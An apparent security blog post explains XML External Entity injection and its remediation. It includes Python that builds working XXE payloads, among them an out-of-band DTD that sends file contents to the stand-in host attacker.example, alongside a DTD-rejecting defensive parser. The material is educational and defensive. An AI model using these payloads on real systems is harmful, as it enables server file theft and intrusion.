Security is hard to get right, and even in today’s security-conscious world a few serious vulnerabilities, such as XML External Entity (XXE) injection, are still overlooked and end up being the cause of a breach. An XXE attack is a type of vulnerability typically found in web applications: a misconfigured XML parser processes attacker-supplied entity declarations, allowing the attacker to read files on the server, or reach hosts on its internal network, that would normally be inaccessible. XXE has been known for more than a decade, yet automated tools only started detecting rudimentary cases of it in the recent past. If the vulnerability is exploited, the damage can be severe, ranging from information disclosure to denial of service, or even remote code execution if everything falls into place.
In this blog, I will explain what an XXE vulnerability is, how it is exploited, and discuss some remediation guidelines.
What is an XML entity?
XML allows the use of entities. An entity acts as a placeholder for a value that will be used within the XML document: wherever the entity is referenced, the parser substitutes its content. Entities shrink the entry of recurring information and make editing easier. XML has several predefined entities which are used to reference special characters such as ‘<’, ‘>’ and ‘&’ (&lt;, &gt; and &amp;). XML also allows the user to define custom entities in the document’s DTD, either with an inline value (an internal entity) or by pointing at a file or URL the parser must fetch (an external entity). The external kind is what XXE abuses.
How does XXE get exploited?
XXE can be exploited in various ways depending on how the application’s XML parser is set up and how the parsed data is rendered back to the client. The exploitation vectors differ by whether the application echoes parsed output, merely evaluates the input on the backend, or can be made to interact with external systems.
Local File Disclosure – Scenario 1
When an application evaluates the vulnerable request and prints the parsed data back to the client, local file disclosure is possible. With a properly crafted payload, an improperly configured parser reads the file named in the external entity declaration from the server’s filesystem and returns its contents in the response, exactly as if the attacker had typed them into the document.
Local File Disclosure – Scenario 2
If the requested file does not contain plain text, or contains characters such as ‘<’ that would make the document malformed once substituted, a different approach is needed. Sub-DTDs are used to extract these file types: the document loads an attacker-hosted DTD, and the work is done with parameter entities (declared with a leading %, and only referenceable inside the DTD) instead of general entities.
Local File Disclosure – Scenario 3
When an application evaluates the user input and its parser is capable of looking up an external file, but no parsed data is ever printed back to the client, data must be extracted by a method known as out-of-band (blind) XXE: the parser is made to send the file contents to an attacker-controlled server, typically by loading an attacker-hosted DTD that builds a URL with the data embedded in it.
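The three scenarios above, as an added example that is not code from the original post. It constructs a throwaway “secret” file and parses the Scenario 1 document with Python’s xml.sax twice: once with external general entities deliberately enabled (the misconfiguration XXE needs) and once with the Python 3.7.1+ default, which leaves them disabled. The builders for the parameter-entity and out-of-band variants (Scenarios 2 and 3) produce the document and the DTD the attacker would host; they are not fetched here because that needs a listening attacker host. The attacker URLs and file paths are made up for the illustration.

```python
"""XXE local file disclosure against xml.sax, plus the Scenario 2/3 payload shapes.

Added example (not from the original post).  The secret file is constructed
for the demo; attacker.example and the target paths are placeholders.
"""
import os
import tempfile
import xml.sax
from io import BytesIO
from xml.sax.handler import ContentHandler, feature_external_ges
from xml.sax.xmlreader import InputSource


class TextCollector(ContentHandler):
    """Stands in for an application that echoes parsed values to the client."""

    def __init__(self):
        super().__init__()
        self.chunks = []

    def characters(self, content):
        self.chunks.append(content)


def local_file_payload(target_path):
    """Scenario 1: an external general entity pointing at a server-side file."""
    return (
        '<?xml version="1.0"?>\n'
        "<!DOCTYPE data [\n"
        f'  <!ENTITY xxe SYSTEM "{target_path}">\n'
        "]>\n"
        "<data>&xxe;</data>\n"
    ).encode()


def sub_dtd_payload(attacker_dtd_url):
    """Scenarios 2 and 3: the document only pulls in an attacker-hosted DTD via
    the parameter entity %remote;; everything else happens inside that DTD."""
    return (
        '<?xml version="1.0"?>\n'
        "<!DOCTYPE data [\n"
        f'  <!ENTITY % remote SYSTEM "{attacker_dtd_url}">\n'
        "  %remote;\n"
        "]>\n"
        "<data>&send;</data>\n"
    )


def oob_dtd(target_path, attacker_url):
    """What the attacker serves at attacker_dtd_url.  %file; is expanded while the
    DTD is read, so the general entity 'send' ends up with a URL that embeds the
    file contents; resolving &send; then ships them to the attacker out of band."""
    return (
        f'<!ENTITY % file SYSTEM "{target_path}">\n'
        f"<!ENTITY % wrap \"<!ENTITY send SYSTEM '{attacker_url}?d=%file;'>\">\n"
        "%wrap;\n"
    )


def parse_text(xml_bytes, resolve_external_entities):
    """Parse with xml.sax; the flag models the parser's (mis)configuration."""
    parser = xml.sax.make_parser()
    parser.setFeature(feature_external_ges, resolve_external_entities)
    handler = TextCollector()
    parser.setContentHandler(handler)
    source = InputSource()
    source.setByteStream(BytesIO(xml_bytes))
    parser.parse(source)
    return "".join(handler.chunks)


def demo(secret=b"db_password=hunter2\n"):
    """Return (text leaked by the misconfigured parser, text from the default one)."""
    with tempfile.NamedTemporaryFile(delete=False) as f:
        f.write(secret)
        path = f.name
    try:
        payload = local_file_payload(path)
        leaked = parse_text(payload, resolve_external_entities=True)
        safe = parse_text(payload, resolve_external_entities=False)
    finally:
        os.unlink(path)
    return leaked, safe


if __name__ == "__main__":
    leaked, safe = demo()
    print("misconfigured parser returned:", repr(leaked))
    print("default parser returned:      ", repr(safe))
    print(sub_dtd_payload("http://attacker.example/evil.dtd"))
    print(oob_dtd("/etc/hostname", "http://attacker.example/collect"))
```

Only the single feature flag separates the two results: with external general entities on, the secret file’s contents arrive in the application’s parsed text; with the default, the entity reference silently produces nothing. The out-of-band DTD keeps the same structure regardless of the target, which is why blind XXE is detected by watching for the request to the attacker host rather than for anything in the response.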
Denial of Service
One of the methods to create a denial of service is “external entity expansion”, in which the document declares an entity that references an XML file hosted at an attacker-controlled address. If the XML parser is configured to resolve external entities, it makes an HTTP request to attackerIP to fetch it.
The file hosted at the attacker’s IP can itself be written to reference further external entities, each of which references more. Before the XML parser can process the document, it must retrieve and expand every defined entity. This can exhaust available memory, CPU or connections and effectively create a denial of service; the same effect is achievable with nested internal entities, which need no network at all.
Depending on the application and how its XML parser has been configured, XXE can be leveraged to pull off more advanced exploits such as:
Internal Port Scanning
Server Side Request Forgery
Remote Code Execution
Where is XXE found commonly?
Upload file functionality
XML based HTTP requests
How to remediate XXE
Know your application’s XML library and how it works, and disable anything that is not needed (external entity resolution, DTD loading, network access from the parser)
Do not allow user-defined DTDs, attributes or (external) entities
Perform input validation on user data before it is handed to the XML parser
OWASP has a detailed description of how to fix XXE for each platform
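One way to apply the first three guidelines in code, as an added example that is not from the original post or from OWASP. parse_untrusted() is a hypothetical wrapper an application would call instead of handing user input straight to its XML library: it drives the standard-library expat parser with handlers that abort on the first DOCTYPE, entity declaration or external entity reference, so neither file disclosure nor entity-expansion denial of service has anything to work with. The sample documents are constructed for the demonstration.

```python
"""Remediation: refuse DTDs at the parser and never resolve entities.

Added example (not from the original post).  parse_untrusted is a
hypothetical wrapper; the sample documents below are constructed.
"""
from xml.parsers import expat


class UnsafeXML(ValueError):
    """Raised for any document that tries to carry a DTD or entities."""


def parse_untrusted(xml_bytes):
    """Return [(tag, text), ...] for a DTD-free document, else raise UnsafeXML."""
    parser = expat.ParserCreate()
    parser.buffer_text = True  # deliver each text node as one chunk

    def reject(*_args):
        raise UnsafeXML("DOCTYPE / entity declarations are not accepted")

    # Hooking the parser rather than regex-scanning the raw bytes means the
    # check also fires for UTF-16 or otherwise encoded input.
    parser.StartDoctypeDeclHandler = reject      # <!DOCTYPE ...>
    parser.EntityDeclHandler = reject            # <!ENTITY ...> of any kind
    parser.ExternalEntityRefHandler = reject     # nothing is ever fetched

    records, open_tags = [], []

    def start(tag, _attrs):
        open_tags.append(tag)

    def end(_tag):
        open_tags.pop()

    def text(data):
        if data.strip():
            records.append((open_tags[-1], data.strip()))

    parser.StartElementHandler = start
    parser.EndElementHandler = end
    parser.CharacterDataHandler = text
    parser.Parse(xml_bytes, True)
    return records


def is_rejected(xml_bytes):
    """True if parse_untrusted refuses the document."""
    try:
        parse_untrusted(xml_bytes)
    except UnsafeXML:
        return True
    return False


# Constructed samples: a benign order document, an XXE attempt, and a small
# nested-entity expansion of the kind used for denial of service.
BENIGN = b'<?xml version="1.0"?><order><item>widget</item><qty>3</qty></order>'
XXE_ATTEMPT = (
    b'<?xml version="1.0"?>'
    b'<!DOCTYPE order [<!ENTITY xxe SYSTEM "/etc/hostname">]>'
    b"<order><item>&xxe;</item></order>"
)
ENTITY_EXPANSION = (
    b'<?xml version="1.0"?>'
    b'<!DOCTYPE lolz [<!ENTITY lol "lol"><!ENTITY lol2 "&lol;&lol;&lol;">]>'
    b"<lolz>&lol2;</lolz>"
)

if __name__ == "__main__":
    print(parse_untrusted(BENIGN))
    for doc in (XXE_ATTEMPT, ENTITY_EXPANSION):
        print("rejected" if is_rejected(doc) else "ACCEPTED", doc[:60])
```

Rejecting the DOCTYPE outright is the simplest rule for most applications because a data feed never needs one; the entity handlers are belt and braces for parsers that report declarations separately. If your application genuinely needs a DTD, keep external entity resolution and network access off and validate against a DTD you ship, never one the client supplies.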
XXE has been observed more frequently in the recent past than SQL-related issues, and it will continue to be a growing security risk. Enterprises need to take proactive steps, including penetration testing, to identify potential points of exploitation in their web applications.
Learn more about XXE attacks and vulnerabilities
Gain realistic insight into potential XXE attacks and vulnerabilities within your organization’s networks, IoT devices, web and mobile applications. Download our white paper today.